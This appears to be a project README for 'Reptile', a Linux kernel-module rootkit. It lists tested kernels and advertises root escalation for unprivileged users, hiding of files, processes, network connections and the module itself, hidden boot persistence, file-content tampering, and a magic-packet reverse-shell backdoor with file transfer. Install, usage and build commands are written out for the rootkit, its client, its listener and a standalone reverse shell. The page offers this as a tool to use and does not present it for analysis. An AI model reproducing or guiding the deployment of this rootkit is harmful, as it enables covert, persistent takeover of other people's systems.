Reptile: LKM Linux rootkit


LKM Linux rootkit

Tested on

Debian 9: 4.9.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64


  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide himself
  • Hide TCP/IP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connect back each X times (not default)


apt-get install linux-headers-$(uname -r)
perl -MCPAN -e “install String::Unescape”
git clone
cd Reptile
./ install


./ remove


Give root to unprivileged users

To get root privileges just type: /reptile/reptile_cmd root

Hide files, directories and kernel module

All files and folders that has reptile in the name will be hidden. You can configure this in the installation script. The following commands hide/unhide files, folders, processes and kernel module.

To hide: /reptile/reptile_cmd hide 
To unhide: /reptile/reptile_cmd show

Hide processes

To hide processes: /reptile/reptile_cmd hide <pid> 
To unhide processes: /reptile/reptile_cmd show <pid>

Hide TCP/IP connections

Hide: /reptile/reptile_cmd conn <IP> <port> hide 
Unhide: /reptile/reptile_cmd conn <IP> <port> show

File content tampering

All content between tags will be hidden:

content to hide 

You can configure these tags in the installation script.


The backdoor is a reverse shell triggered by a magic packet sent via TCP, UDP or ICMP protocol.



./setup client

The client is MSF-like and its usage is very easy. Run ./client and just type help to see the commands.


There are another two binaries: listener and packet. The client binary will handle listener and packet but you can use them separately if you want:



The shell easy to use, just type help to see the commands.

  • It already hide its process and connection.
  • Its connection is encrypted
  • There is a file uploader and file downloader inside.
  • You can set a delay to receive a reverse connection every time you want.
  • If you run shell you will get a full TTY/PTY shell like ssh.


You can compile this shell in a standalone version to use without the Kernel Module:

./setup reverse

You will need to use listener to connect with the standalone reverse shell because you won’t send magic packets. Just compile with ./setup client and use listener binary!